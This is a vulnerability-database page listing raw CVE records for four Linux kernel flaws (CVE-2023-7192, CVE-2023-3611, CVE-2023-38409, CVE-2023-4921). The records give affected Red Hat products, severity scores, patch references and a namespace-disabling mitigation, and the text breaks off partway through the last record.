|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T08:57:34.101Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2006",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2006"
},
{
"name": "RHSA-2024:2008",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2008"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-7192"
},
{
"name": "RHBZ#2256279",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256279"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=ac4893980bbe79ce383daf9a0885666a30fe4c83"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-7192",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-16T19:33:50.679311Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-14T19:11:30.973Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.2::nfv",
"cpe:/a:redhat:rhel_tus:8.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.rt13.184.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.133.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::realtime",
"cpe:/a:redhat:rhel_tus:8.4::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.rt7.201.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.51.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::appstream",
"cpe:/o:redhat:rhel_eus:9.0::baseos",
"cpe:/a:redhat:rhel_eus:9.0::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.2.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::nfv",
"cpe:/a:redhat:rhel_eus:9.0::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.1.rt21.165.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::realtime",
"cpe:/a:redhat:rhel_eus:9.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.95.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unknown",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-02-10T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-401",
"description": "Missing Release of Memory after Effective Lifetime",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T00:00:20.377Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:1188",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1188"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2006",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2006"
},
{
"name": "RHSA-2024:2008",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2008"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-7192"
},
{
"name": "RHBZ#2256279",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256279"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=ac4893980bbe79ce383daf9a0885666a30fe4c83"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-09-13T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-02-10T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: refcount leak in ctnetlink_create_conntrack()",
"workarounds": [
{
"lang": "en",
"value": "Triggering this issue requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.\n\nAlternatively, skip loading the affected netfilter module (i.e., nf_conntrack_netlink) onto the system until we have a fix available. This can be done by a blacklist mechanism which will ensure the driver is not loaded at boot time.\n~~~\nHow do I blacklist a kernel module to prevent it from loading automatically?\nhttps://access.redhat.com/solutions/41278 \n~~~"
}
],
"x_redhatCweChain": "CWE-401: Missing Release of Memory after Effective Lifetime"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-7192",
"datePublished": "2024-01-02T19:02:45.371Z",
"dateReserved": "2023-12-30T18:12:05.167Z",
"dateUpdated": "2025-10-10T00:00:20.377Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3611 (GCVE-0-2023-3611)
Vulnerability from cvelistv5
Published
2023-07-21 20:49
Modified
2025-02-13 16:56
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-787 - Out-of-bounds Write
Summary
An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.
We recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:01:57.288Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230908-0002/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.5",
"status": "affected",
"version": "3.8",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-3611",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-27T13:33:11.602895Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T13:43:55.993Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.5",
"status": "affected",
"version": "3.8",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Lion"
}
],
"datePublic": "2023-07-13T09:11:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eAn out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.\u003c/p\u003e"
}
],
"value": "An out-of-bounds write vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nThe qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.\n\nWe recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787 Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:07:18.060Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64"
},
{
"url": "https://kernel.dance/3e337087c3b5805fe0b8a46ba622a962880b5d64"
},
{
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230908-0002/"
},
{
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Out-of-bounds write in Linux kernel\u0027s net/sched: sch_qfq component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-3611",
"datePublished": "2023-07-21T20:49:10.812Z",
"dateReserved": "2023-07-10T20:52:55.365Z",
"dateUpdated": "2025-02-13T16:56:15.625Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-38409 (GCVE-0-2023-38409)
Vulnerability from cvelistv5
Published
2023-07-17 00:00
Modified
2024-10-30 14:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue was discovered in set_con2fb_map in drivers/video/fbdev/core/fbcon.c in the Linux kernel before 6.2.12. Because an assignment occurs only for the first vc, the fbcon_registered_fb and fbcon_display arrays can be desynchronized in fbcon_mode_deleted (the con2fb_map points at the old fb_info).
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:39:13.503Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fffb0b52d5258554c645c966c6cbef7de50b851d"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.12"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-38409",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-30T14:58:04.173881Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-30T14:58:56.847Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in set_con2fb_map in drivers/video/fbdev/core/fbcon.c in the Linux kernel before 6.2.12. Because an assignment occurs only for the first vc, the fbcon_registered_fb and fbcon_display arrays can be desynchronized in fbcon_mode_deleted (the con2fb_map points at the old fb_info)."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-17T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fffb0b52d5258554c645c966c6cbef7de50b851d"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.12"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-38409",
"datePublished": "2023-07-17T00:00:00",
"dateReserved": "2023-07-17T00:00:00",
"dateUpdated": "2024-10-30T14:58:56.847Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-4921 (GCVE-0-2023-4921)
Vulnerability from cvelistv5
Published
2023-09-12 19:45
Modified
2025-02-13 17:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
When the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().
We recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8.
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:44:52.210Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8fc134fee27f2263988ae38920bc03da416b03d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/8fc134fee27f2263988ae38920bc03da416b03d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.6",
"status": "affected",
"version": "3.8",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "valis"
}
],
"datePublic": "2023-09-05T06:54:12.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_qfq component can be exploited to achieve local privilege escalation.\n\nWhen the plug qdisc is used as a class of the qfq qdisc, sending network packets triggers use-after-free in qfq_dequeue() due to the incorrect .peek handler of sch_plug and lack of error checking in agg_dequeue().\n\nWe recommend upgrading past commit 8fc134fee27f2263988ae38920bc03da416b03d8."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
